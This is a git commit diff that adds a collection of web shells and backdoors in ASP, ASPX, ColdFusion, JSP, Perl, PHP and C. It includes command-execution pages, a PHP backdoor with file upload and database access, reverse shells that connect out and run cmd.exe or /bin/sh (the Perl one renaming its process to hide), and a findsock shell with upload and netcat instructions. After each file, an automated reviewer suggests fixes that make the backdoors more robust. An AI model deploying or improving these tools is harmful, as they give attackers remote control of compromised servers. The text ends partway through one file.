added kali linux webshells to start building repo

Tyler Bennett 2013-11-12 15:52:12 -05:00
commit f6f3f0aa55
15 changed files with 1398 additions and 0 deletions

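--- /dev/null
+++ b/README.md
@@ -0,0 +1 @@
+Various webshells. We accept pull requests for additions to this collection.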

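--- /dev/null
+++ b/asp/cmd-asp-5.1.asp
@@ -0,0 +1,41 @@
+<%
+' ASP Cmd Shell On IIS 5.1
+' brett.moore_at_security-assessment.com
+' http://seclists.org/bugtraq/2006/Dec/0226.html
+Dim oS,oSNet,oFSys, oF,szCMD, szTF
+On Error Resume Next
+Set oS = Server.CreateObject("WSCRIPT.SHELL")
+Set oSNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFSys = Server.CreateObject("Scripting.FileSystemObject")
+szCMD = Request.Form("C")
+If (szCMD <> "") Then
+szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" & oFSys.GetTempName()
+' Here we do the command
+Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
+""",0,True)
+response.write szTF
+' Change perms
+Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G
+everyone:F",0,True)
+Set oF = oFSys.OpenTextFile(szTF,1,False,0)
+End If
+%>
+<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
+<input type=text name="C" size=70 value="<%= szCMD %>">
+<input type=submit value="Run"></FORM><PRE>
+Machine: <%=oSNet.ComputerName%><BR>
+Username: <%=oSNet.UserName%><br>
+<%
+If (IsObject(oF)) Then
+On Error Resume Next
+Response.Write Server.HTMLEncode(oF.ReadAll)
+oF.Close
+Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)
+End If
+%>
+<!-- http://michaeldaw.org 2006 -->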
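Review bot: `response.write szTF` and `value="<%= szCMD %>"` put the temp-file path and the raw `C` form field into the page unencoded, while the command output a few lines later goes through `Server.HTMLEncode`; the same unencoded echo of the submitted command into an input's `value` attribute appears in asp/cmdasp.asp (`value="<%= szCMD %>"`) and cfm/cfexec.cfm (`value="#form.cmd#"`, `value="#form.opts#"`). Use `Server.HTMLEncode(szCMD)` in the attribute and encode `szTF` the same way. Separately, the `cacls.exe ... /E /G everyone:F` call makes the output file world-writable, and that file is only deleted in the second block when `IsObject(oF)` holds, so under `On Error Resume Next` any earlier failure leaves a world-writable file under `c:\windows\pchealth\ERRORREP\QHEADLES`; the header comment should state that this is the on-disk residue the page can leave behind.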

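--- /dev/null
+++ b/asp/cmdasp.asp
@@ -0,0 +1,55 @@
+<%@ Language=VBScript %>
+<%
+' --------------------o0o--------------------
+' File: CmdAsp.asp
+' Author: Maceo <maceo @ dogmile.com>
+' Release: 2000-12-01
+' OS: Windows 2000, 4.0 NT
+' -------------------------------------------
+Dim oScript
+Dim oScriptNet
+Dim oFileSys, oFile
+Dim szCMD, szTempFile
+On Error Resume Next
+' -- create the COM objects that we will be using -- '
+Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+' -- check for a command that we have posted -- '
+szCMD = Request.Form(".CMD")
+If (szCMD <> "") Then
+' -- Use a poor man's pipe ... a temp file -- '
+szTempFile = "C:\" & oFileSys.GetTempName( )
+Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
+Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
+End If
+%>
+<HTML>
+<BODY>
+<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
+<input type=text name=".CMD" size=45 value="<%= szCMD %>">
+<input type=submit value="Run">
+</FORM>
+<PRE>
+<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
+<br>
+<%
+If (IsObject(oFile)) Then
+' -- Read the output from our command and remove the temp file -- '
+On Error Resume Next
+Response.Write Server.HTMLEncode(oFile.ReadAll)
+oFile.Close
+Call oFileSys.DeleteFile(szTempFile, True)
+End If
+%>
+</BODY>
+</HTML>
+<!-- http://michaeldaw.org 2006 -->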
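Review bot: The temp file created by `szTempFile = "C:\" & oFileSys.GetTempName( )` is only removed in the second block when `IsObject(oFile)` holds, and both blocks run under `On Error Resume Next`, so a failed `OpenTextFile` or a failed `DeleteFile` leaves the command output sitting in the root of `C:` with nothing reported. At minimum, call `oFileSys.DeleteFile(szTempFile, True)` from the first block as well when `OpenTextFile` does not yield an object, and drop the second `On Error Resume Next` so a delete failure is visible. The header comment would also benefit from a line stating that output is staged through a file in `C:\`, since that is what remains on disk when cleanup fails.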

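--- /dev/null
+++ b/aspx/cmdasp.aspx
@@ -0,0 +1,42 @@
+<%@ Page Language="C#" Debug="true" Trace="false" %>
+<%@ Import Namespace="System.Diagnostics" %>
+<%@ Import Namespace="System.IO" %>
+<script Language="c#" runat="server">
+void Page_Load(object sender, EventArgs e)
+{
+}
+string ExcuteCmd(string arg)
+{
+ProcessStartInfo psi = new ProcessStartInfo();
+psi.FileName = "cmd.exe";
+psi.Arguments = "/c "+arg;
+psi.RedirectStandardOutput = true;
+psi.UseShellExecute = false;
+Process p = Process.Start(psi);
+StreamReader stmrdr = p.StandardOutput;
+string s = stmrdr.ReadToEnd();
+stmrdr.Close();
+return s;
+}
+void cmdExe_Click(object sender, System.EventArgs e)
+{
+Response.Write("<pre>");
+Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
+Response.Write("</pre>");
+}
+</script>
+<HTML>
+<HEAD>
+<title>awen asp.net webshell</title>
+</HEAD>
+<body >
+<form id="cmd" method="post" runat="server">
+<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
+<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
+<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
+</form>
+</body>
+</HTML>
+<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
+<!-- http://michaeldaw.org 04/2007 -->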
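Review bot: `Process p = Process.Start(psi);` in `ExcuteCmd` is never disposed or waited on: only the `StreamReader` is closed, so each request leaks a `Process` handle and returns before the child has exited. Wrap it in the block form, `using (Process p = Process.Start(psi)) { string s = p.StandardOutput.ReadToEnd(); p.WaitForExit(); return s; }`, reading to end before `WaitForExit()` so a full stdout pipe cannot stall the child. `Debug="true"` in the `@ Page` directive compiles the page with debug symbols and detailed error pages and should be `false` outside active debugging. The empty `Page_Load` and the misspelled `ExcuteCmd` / `excute` are style nits.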

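--- /dev/null
+++ b/cfm/cfexec.cfm
@@ -0,0 +1,43 @@
+<html>
+<body>
+<!-- Contributed by Kurt Grutzmacher () -->
+Notes:<br><br>
+<ul>
+<li>Prefix DOS commands with "c:\windows\system32\cmd.exe /c &lt;command&gt;" or wherever cmd.exe is<br>
+<li>Options are, of course, the command line options you want to run
+<li>CFEXECUTE could be removed by the admin. If you have access to CFIDE/administrator you can re-enable it
+</ul>
+<p>
+<cfoutput>
+<table>
+<form method="POST" action="cfexec.cfm">
+<tr><td>Command:</td><td><input type=text name="cmd" size=50
+<cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr>
+<tr><td>Options:</td><td> <input type=text name="opts" size=50
+<cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr>
+<tr><td>Timeout:</td><td> <input type=text name="timeout" size=4
+<cfif isdefined("form.timeout")>value="#form.timeout#"
+<cfelse>value="5"</cfif>></td></tr>
+</table>
+<input type=submit value="Exec" >
+</FORM>
+<cfif isdefined("form.cmd")>
+<cfsavecontent variable="myVar">
+<cfexecute name = "#Form.cmd#"
+arguments = "#Form.opts#"
+timeout = "#Form.timeout#">
+</cfexecute>
+</cfsavecontent>
+<pre>
+#myVar#
+</pre>
+</cfif>
+</cfoutput>
+</body>
+</html>
+<!-- Contributed by Kurt Grutzmacher (http://grutz.jingojango.net/exploits/) -->
+<!-- http://michaeldaw.org 04/2007 -->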
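Review bot: The attribution comment at the top, `<!-- Contributed by Kurt Grutzmacher () -->`, has an empty parenthesis and duplicates the complete one at the bottom, `<!-- Contributed by Kurt Grutzmacher (http://grutz.jingojango.net/exploits/) -->`; keep one of them. The `timeout` field is interpolated straight into `<cfexecute ... timeout = "#Form.timeout#">` without a numeric check, so a non-numeric value surfaces as a ColdFusion runtime error instead of a form message; a `<cfif not isNumeric(form.timeout)>` guard before the `cfexecute` would cover that. The `<cfif isdefined("form.cmd")>` that wraps the `cfexecute` does not also require `form.opts` and `form.timeout`, which the same guard should check since all three are read inside it.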

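--- /dev/null
+++ b/jsp/cmdjsp.jsp
@@ -0,0 +1,32 @@
+// note that linux = cmd and windows = "cmd.exe /c + cmd"
+<FORM METHOD=GET ACTION='cmdjsp.jsp'>
+<INPUT name='cmd' type=text>
+<INPUT type=submit value='Run'>
+</FORM>
+<%@ page import="java.io.*" %>
+<%
+String cmd = request.getParameter("cmd");
+String output = "";
+if(cmd != null) {
+String s = null;
+try {
+Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
+BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
+while((s = sI.readLine()) != null) {
+output += s;
+}
+}
+catch(IOException e) {
+e.printStackTrace();
+}
+}
+%>
+<pre>
+<%=output %>
+</pre>
+<!-- http://michaeldaw.org 2006 -->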
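Review bot: The leading comment `// note that linux = cmd and windows = "cmd.exe /c + cmd"` describes a platform choice the code does not make: `Runtime.getRuntime().exec("cmd.exe /C " + cmd)` is hard-wired to Windows, so the comment should say that (`<%-- Windows only: the command is always run through cmd.exe /C --%>`) or go. As written the `//` line also sits outside any `<% %>` block, so it is emitted as literal page text rather than treated as a comment. `output += s` inside the `readLine()` loop is string concatenation in a loop where a `StringBuilder` is the idiomatic form, and `e.printStackTrace()` reports failures only to the container's stderr/log rather than the response, which is worth stating in the comment.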

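--- /dev/null
+++ b/jsp/jsp-reverse.jsp
@@ -0,0 +1,91 @@
+// backdoor.jsp
+// http://www.security.org.sg/code/jspreverse.html
+<%@
+page import="java.lang.*, java.util.*, java.io.*, java.net.*"
+% >
+<%!
+static class StreamConnector extends Thread
+{
+InputStream is;
+OutputStream os;
+StreamConnector(InputStream is, OutputStream os)
+{
+this.is = is;
+this.os = os;
+}
+public void run()
+{
+BufferedReader isr = null;
+BufferedWriter osw = null;
+try
+{
+isr = new BufferedReader(new InputStreamReader(is));
+osw = new BufferedWriter(new OutputStreamWriter(os));
+char buffer[] = new char[8192];
+int lenRead;
+while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
+{
+osw.write(buffer, 0, lenRead);
+osw.flush();
+}
+}
+catch (Exception ioe)
+try
+{
+if(isr != null) isr.close();
+if(osw != null) osw.close();
+}
+catch (Exception ioe)
+}
+}
+%>
+<h1>JSP Backdoor Reverse Shell</h1>
+<form method="post">
+IP Address
+<input type="text" name="ipaddress" size=30>
+Port
+<input type="text" name="port" size=10>
+<input type="submit" name="Connect" value="Connect">
+</form>
+<p>
+<hr>
+<%
+String ipAddress = request.getParameter("ipaddress");
+String ipPort = request.getParameter("port");
+if(ipAddress != null && ipPort != null)
+{
+Socket sock = null;
+try
+{
+sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
+Runtime rt = Runtime.getRuntime();
+Process proc = rt.exec("cmd.exe");
+StreamConnector outputConnector =
+new StreamConnector(proc.getInputStream(),
+sock.getOutputStream());
+StreamConnector inputConnector =
+new StreamConnector(sock.getInputStream(),
+proc.getOutputStream());
+outputConnector.start();
+inputConnector.start();
+}
+catch(Exception e)
+}
+%>
+<!-- http://michaeldaw.org 2006 -->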
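Review bot: Neither `sock` nor `proc` is ever closed or destroyed: the scriptlet starts the two `StreamConnector` threads and returns, so the `cmd.exe` child and the TCP socket outlive the request with nothing in the page tracking or tearing them down. The `catch (Exception ioe)` clauses in `run()` and the `catch(Exception e)` after the `start()` calls carry no block at all as rendered, so whatever they were meant to do, the exception is discarded with no trace; `e.printStackTrace()` at least belongs there. The page directive is also terminated with `% >` (with a space) rather than `%>`, and the two `// backdoor.jsp` lines above it sit outside any JSP comment or scriptlet and are emitted as page text.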

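--- /dev/null
+++ b/perl/perl-reverse-shell.pl
@@ -0,0 +1,124 @@
+#!/usr/bin/perl -w
+# perl-reverse-shell - A Reverse Shell implementation in PERL
+# Copyright (C) 2006 pentestmonkey@pentestmonkey.net
+#
+# This tool may be used for legal purposes only. Users take full responsibility
+# for any actions performed using this tool. The author accepts no liability
+# for damage caused by this tool. If these terms are not acceptable to you, then
+# do not use this tool.
+#
+# In all other respects the GPL version 2 applies:
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2 as
+# published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License along
+# with this program; if not, write to the Free Software Foundation, Inc.,
+# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+#
+# This tool may be used for legal purposes only. Users take full responsibility
+# for any actions performed using this tool. If these terms are not acceptable to
+# you, then do not use this tool.
+#
+# You are encouraged to send comments, improvements or suggestions to
+# me at pentestmonkey@pentestmonkey.net
+#
+# Description
+# -----------
+# This script will make an outbound TCP connection to a hardcoded IP and port.
+# The recipient will be given a shell running as the current user (apache normally).
+#
+use strict;
+use Socket;
+use FileHandle;
+use POSIX;
+my $VERSION = "1.0";
+# Where to send the reverse shell. Change these.
+my $ip = '127.0.0.1';
+my $port = 1234;
+# Options
+my $daemon = 1;
+my $auth = 0; # 0 means authentication is disabled and any
+# source IP can access the reverse shell
+my $authorised_client_pattern = qr(^127\.0\.0\.1$);
+# Declarations
+my $global_page = "";
+my $fake_process_name = "/usr/sbin/apache";
+# Change the process name to be less conspicious
+$0 = "[httpd]";
+# Authenticate based on source IP address if required
+if (defined($ENV{'REMOTE_ADDR'})) {
+cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");
+if ($auth) {
+unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
+cgiprint("ERROR: Your client isn't authorised to view this page");
+cgiexit();
+}
+}
+} elsif ($auth) {
+cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access");
+cgiexit(0);
+}
+# Background and dissociate from parent process if required
+if ($daemon) {
+my $pid = fork();
+if ($pid) {
+cgiexit(0); # parent exits
+}
+setsid();
+chdir('/');
+umask(0);
+}
+# Make TCP connection for reverse shell
+socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
+if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
+cgiprint("Sent reverse shell to $ip:$port");
+cgiprintpage();
+} else {
+cgiprint("Couldn't open reverse shell to $ip:$port: $!");
+cgiexit();
+}
+# Redirect STDIN, STDOUT and STDERR to the TCP connection
+open(STDIN, ">&SOCK");
+open(STDOUT,">&SOCK");
+open(STDERR,">&SOCK");
+$ENV{'HISTFILE'} = '/dev/null';
+system("w;uname -a;id;pwd");
+exec({"/bin/sh"} ($fake_process_name, "-i"));
+# Wrapper around print
+sub cgiprint {
+my $line = shift;
+$line .= "<p>\n";
+$global_page .= $line;
+}
+# Wrapper around exit
+sub cgiexit {
+cgiprintpage();
+exit 0; # 0 to ensure we don't give a 500 response.
+}
+# Form HTTP response using all the messages gathered by cgiprint so far
+sub cgiprintpage {
+print "Content-Length: " . length($global_page) . "\r
+Connection: close\r
+Content-Type: text\/html\r\n\r\n" . $global_page;
+}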
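Review bot: `cgiexit` is called both as `cgiexit()` and as `cgiexit(0)`, but `sub cgiexit` takes no argument and always runs `exit 0` (deliberately, per its comment `# 0 to ensure we don't give a 500 response.`), so the `0` at the two call sites suggests a status that is never honoured; drop it. The `if ($daemon)` block tests `$pid` but not whether `fork()` returned `undef`, so a failed fork silently continues in the foreground of the CGI process. The Description header documents the outbound connection and the user it runs as but not that the script overwrites `$0` with `[httpd]` and execs the shell with argv[0] set to `$fake_process_name`; a line such as `# Note: the process renames itself via $0 and execs /bin/sh under a fake argv[0]` belongs in the header so this behaviour is visible without reading the body.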

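--- /dev/null
+++ b/perl/perlcmd.cgi
@@ -0,0 +1,34 @@
+#!/usr/bin/perl -w
+use strict;
+print "Cache-Control: no-cache\n";
+print "Content-type: text/html\n\n";
+my $req = $ENV{QUERY_STRING};
+chomp ($req);
+$req =~ s/%20/ /g;
+$req =~ s/%3b/;/g;
+print "<html><body>";
+print '<!-- Simple CGI backdoor by DK (http://michaeldaw.org) -->';
+if (!$req) {
+print "Usage: http://target.com/perlcmd.cgi?cat /etc/passwd";
+}
+else {
+print "Executing: $req";
+}
+print "<pre>";
+my @cmd = `$req`;
+print "</pre>";
+foreach my $line (@cmd) {
+print $line . "<br/>";
+}
+print "</body></html>";
+# <!-- http://michaeldaw.org 2006 -->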
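Review bot: The backtick execution of `$req` (`my @cmd = ...`) runs unconditionally, so when `$req` is empty the script prints the usage text and then still spawns a shell with an empty command; it belongs inside the `else` branch. `$ENV{QUERY_STRING}` is undefined when no query string is present, so under `-w` the `chomp` and both `s///` substitutions warn about an undefined value; `my $req = defined $ENV{QUERY_STRING} ? $ENV{QUERY_STRING} : '';` avoids that. The `<pre>` is also closed before the `foreach` that prints the output, so the tag wraps nothing.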

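--- /dev/null
+++ b/php/findsock.c
@@ -0,0 +1,137 @@
+// php-findsock-shell - A Findsock Shell implementation in PHP + C
+// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
+//
+// This tool may be used for legal purposes only. Users take full responsibility
+// for any actions performed using this tool. The author accepts no liability
+// for damage caused by this tool. If these terms are not acceptable to you, then
+// do not use this tool.
+//
+// In all other respects the GPL version 2 applies:
+//
+// This program is free software; you can redistribute it and/or modify
+// it under the terms of the GNU General Public License version 2 as
+// published by the Free Software Foundation.
+//
+// This program is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License along
+// with this program; if not, write to the Free Software Foundation, Inc.,
+// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+//
+// You are encouraged to send comments, improvements or suggestions to
+// me at pentestmonkey@pentestmonkey.net
+//
+// Description
+// -----------
+// (Pair of) Web server scripts that find the TCP socket being used by the
+// client to connect to the web server and attaches a shell to it. This
+// provides you, the pentester, with a fully interactive shell even if the
+// Firewall is performing proper ingress and egress filtering.
+//
+// Proper interactive shells are more useful than web-based shell in some
+// circumstances, e.g:
+// 1: You want to change your user with "su"
+// 2: You want to upgrade your shell using a local exploit
+// 3: You want to log into another system using telnet / ssh
+//
+// Limitations
+// -----------
+// The shell traffic doesn't look much like HTTP, so I guess that you may
+// have problems if the site is being protected by a Layer 7 (Application layer)
+// Firewall.
+//
+// The shell isn't fully implemented in PHP: you also need to upload a
+// C program. You need to either:
+// 1: Compile the program for the appropriate OS / architecture then
+// upload it; or
+// 2: Upload the source and hope there's a C compiler installed.
+//
+// This is a pain, but I couldn't figure out how to implement the findsock
+// mechanism in PHP. Email me if you manage it. I'd love to know.
+//
+// Only tested on x86 / amd64 Gentoo Linux.
+//
+// Usage
+// -----
+// See http://pentestmonkey.net/tools/php-findsock-shell if you get stuck.
+//
+// Here are some brief instructions.
+//
+// 1: Compile findsock.c for use on the target web server:
+// $ gcc -o findsock findsock.c
+//
+// Bear in mind that the web server might be running a different OS / architecture to you.
+//
+// 2: Upload "php-findsock-shell.php" and "findsock" binary to the web server using
+// whichever upload vulnerability you've indentified. Both should be uploaded to the
+// same directory.
+//
+// 3: Run the shell from a netcat session (NOT a browser - remember this is an
+// interactive shell).
+//
+// $ nc -v target 80
+// target [10.0.0.1] 80 (http) open
+// GET /php-findsock-shell.php HTTP/1.0
+//
+// sh-3.2$ id
+// uid=80(apache) gid=80(apache) groups=80(apache)
+// sh-3.2$
+// ... you now have an interactive shell ...
+//
+#include <sys/socket.h>
+#include <stdio.h>
+#include <string.h>
+#include <arpa/inet.h>
+#include <netinet/in.h>
+#include <unistd.h>
+int main (int argc, char** argv) {
+// Usage message
+if (argc != 3) {
+printf("Usage: findsock ip port\n");
+exit(0);
+}
+// Process args
+char *sock_ip = argv[1];
+char *sock_port = argv[2];
+// Declarations
+struct sockaddr_in rsa;
+struct sockaddr_in lsa;
+int size = sizeof(rsa);
+char remote_ip[30];
+int fd;
+// Inspect all file handles
+for (fd=3; fd<getdtablesize(); fd++) {
+// Check if file handle is a socket
+// If so, get remote IP and port
+if (getpeername(fd, &rsa, &size) != -1) {
+strncpy(remote_ip, inet_ntoa(*(struct in_addr *)&rsa.sin_addr.s_addr), 30);
+// Check if IP for this socket match
+// the socket we're trying to find.
+if (strncmp(remote_ip, sock_ip, 30) == 0) {
+// Check if Port for this socket match
+// the socket we're trying to find.
+if ((int)ntohs(rsa.sin_port) == (int)atoi(sock_port)) {
+// Run command
+setsid();
+dup2(fd, 0);
+dup2(fd, 1);
+dup2(fd, 2);
+close(fd);
+execl("/bin/sh", "/bin/sh", "-i", NULL);
+}
+}
+}
+}
+}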
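Review bot: `int size = sizeof(rsa);` is passed as `&size` to `getpeername`, whose third parameter is `socklen_t *`, and since `getpeername` writes the address length back through that pointer, `size` is never reset between iterations of the `for (fd=3; ...)` loop; declare it `socklen_t size;` and assign `size = sizeof(rsa);` at the top of each iteration. `exit` and `atoi` are used without `#include <stdlib.h>`, and `struct sockaddr_in lsa;` is declared but never used. The header says `Only tested on x86 / amd64 Gentoo Linux`, which is also where `getdtablesize()` (a BSD extension rather than POSIX) comes from; that dependency is worth a comment next to the loop.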

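--- /dev/null
+++ b/php/php-backdoor.php
@@ -0,0 +1,71 @@
+<?
+// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
+ob_implicit_flush();
+if(isset($_REQUEST['f'])){
+$filename=$_REQUEST['f'];
+$file=fopen("$filename","rb");
+fpassthru($file);
+die;
+}
+if(isset($_REQUEST['d'])){
+$d=$_REQUEST['d'];
+echo "<pre>";
+if ($handle = opendir("$d")) {
+echo "<h2>listing of $d</h2>";
+while ($dir = readdir($handle)){
+if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
+else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
+echo "$dir\n";
+echo "</font></a>";
+}
+} else echo "opendir() failed";
+closedir($handle);
+die ("<hr>");
+}
+if(isset($_REQUEST['c'])){
+echo "<pre>";
+system($_REQUEST['c']);
+die;
+}
+if(isset($_REQUEST['upload'])){
+if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
+else $dir=$_REQUEST['dir'];
+$fname=$HTTP_POST_FILES['file_name']['name'];
+if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
+die('file uploading error.');
+}
+if(isset($_REQUEST['mquery'])){
+$host=$_REQUEST['host'];
+$usr=$_REQUEST['usr'];
+$passwd=$_REQUEST['passwd'];
+$db=$_REQUEST['db'];
+$mquery=$_REQUEST['mquery'];
+mysql_connect("$host", "$usr", "$passwd") or
+die("Could not connect: " . mysql_error());
+mysql_select_db("$db");
+$result = mysql_query("$mquery");
+if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
+while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);
+mysql_free_result($result);
+die;
+}
+?>
+<pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form>
+<form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
+upload file:<input name="file_name" type="file"> to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
+<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
+<br>for example:
+http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
+or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
+<hr>execute mysql query:
+<form action="<? echo $PHP_SELF; ?>" METHOD=GET >
+host:<input type="text" name="host"value="localhost"> user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
+database: <input type="text" name="db"> query: <input type="text" name="mquery"> <input type="submit" value="execute">
+</form>
+<!-- http://michaeldaw.org 2006 -->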
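Review bot: `closedir($handle);` sits after the whole `if ($handle = opendir("$d")) { ... } else echo "opendir() failed";` statement rather than inside the success branch, so on failure it is called with `false`; move it inside the `if` block. The `f` branch likewise calls `fpassthru($file)` without checking that `fopen` returned a resource. The file also depends on `register_globals`-style variables (`$PHP_SELF`, `$SERVER_NAME`, `$REQUEST_URI`), on `$HTTP_POST_FILES`, on `<?` short open tags and on the `mysql_*` extension, all of which have been removed from current PHP; the header comment (`a simple php backdoor | coded by z0mbie [30.08.03]`) should state the PHP version it was written against so a reader knows why it does not run as-is.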

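--- /dev/null
+++ b/php/php-findsock-shell.php
@@ -0,0 +1,89 @@
+<?php
+// php-findsock-shell - A Findsock Shell implementation in PHP + C
+// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
+//
+// This tool may be used for legal purposes only. Users take full responsibility
+// for any actions performed using this tool. The author accepts no liability
+// for damage caused by this tool. If these terms are not acceptable to you, then
+// do not use this tool.
+//
+// In all other respects the GPL version 2 applies:
+//
+// This program is free software; you can redistribute it and/or modify
+// it under the terms of the GNU General Public License version 2 as
+// published by the Free Software Foundation.
+//
+// This program is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License along
+// with this program; if not, write to the Free Software Foundation, Inc.,
+// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+//
+// You are encouraged to send comments, improvements or suggestions to
+// me at pentestmonkey@pentestmonkey.net
+//
+// Description
+// -----------
+// (Pair of) Web server scripts that find the TCP socket being used by the
+// client to connect to the web server and attaches a shell to it. This
+// provides you, the pentester, with a fully interactive shell even if the
+// Firewall is performing proper ingress and egress filtering.
+//
+// Proper interactive shells are more useful than web-based shell in some
+// circumstances, e.g:
+// 1: You want to change your user with "su"
+// 2: You want to upgrade your shell using a local exploit
+// 3: You want to log into another system using telnet / ssh
+//
+// Limitations
+// -----------
+// The shell traffic doesn't look much like HTTP, so I guess that you may
+// have problems if the site is being protected by a Layer 7 (Application layer)
+// Firewall.
+//
+// The shell isn't fully implemented in PHP: you also need to upload a
+// C program. You need to either:
+// 1: Compile the program for the appropriate OS / architecture then
+// upload it; or
+// 2: Upload the source and hope there's a C compiler installed.
+//
+// This is a pain, but I couldn't figure out how to implement the findsock
+// mechanism in PHP. Email me if you manage it. I'd love to know.
+//
+// Only tested on x86 / amd64 Gentoo Linux.
+//
+// Usage
+// -----
+// See http://pentestmonkey.net/tools/php-findsock-shell if you get stuck.
+//
+// Here are some brief instructions.
+//
+// 1: Compile findsock.c for use on the target web server:
+// $ gcc -o findsock findsock.c
+//
+// Bear in mind that the web server might be running a different OS / architecture to you.
+//
+// 2: Upload "php-findsock-shell.php" and "findsock" binary to the web server using
+// whichever upload vulnerability you've indentified. Both should be uploaded to the
+// same directory.
+//
+// 3: Run the shell from a netcat session (NOT a browser - remember this is an
+// interactive shell).
+//
+// $ nc -v target 80
+// target [10.0.0.1] 80 (http) open
+// GET /php-findsock-shell.php HTTP/1.0
+//
+// sh-3.2$ id
+// uid=80(apache) gid=80(apache) groups=80(apache)
+// sh-3.2$
+// ... you now have an interactive shell ...
+//
+$VERSION = "1.0";
+system( "./findsock " . $_SERVER['REMOTE_ADDR'] . " " . $_SERVER['REMOTE_PORT'] )
+?>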
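Review bot: The comment header of this file is a verbatim copy of the one in php/findsock.c (description, limitations and usage included), so the two now have to be kept in sync by hand; keep the full text in one of them and reduce the other to a pointer such as `// See findsock.c for the description, limitations and usage of this pair of scripts.`. `$VERSION = "1.0";` is assigned and never read. The `./findsock` path in the `system(...)` call is resolved against the PHP process's working directory, which the usage section silently assumes is the directory both files were placed in; that assumption belongs in the comment rather than being implied by the upload instructions.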

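--- /dev/null
+++ b/php/php-reverse-shell.php
@@ -0,0 +1,192 @@
+<?php
+// php-reverse-shell - A Reverse Shell implementation in PHP
+// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
+//
+// This tool may be used for legal purposes only. Users take full responsibility
+// for any actions performed using this tool. The author accepts no liability
+// for damage caused by this tool. If these terms are not acceptable to you, then
+// do not use this tool.
+//
+// In all other respects the GPL version 2 applies:
+//
+// This program is free software; you can redistribute it and/or modify
+// it under the terms of the GNU General Public License version 2 as
+// published by the Free Software Foundation.
+//
+// This program is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License along
+// with this program; if not, write to the Free Software Foundation, Inc.,
+// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+//
+// This tool may be used for legal purposes only. Users take full responsibility
+// for any actions performed using this tool. If these terms are not acceptable to
+// you, then do not use this tool.
+//
+// You are encouraged to send comments, improvements or suggestions to
+// me at pentestmonkey@pentestmonkey.net
+//
+// Description
+// -----------
+// This script will make an outbound TCP connection to a hardcoded IP and port.
+// The recipient will be given a shell running as the current user (apache normally).
+//
+// Limitations
+// -----------
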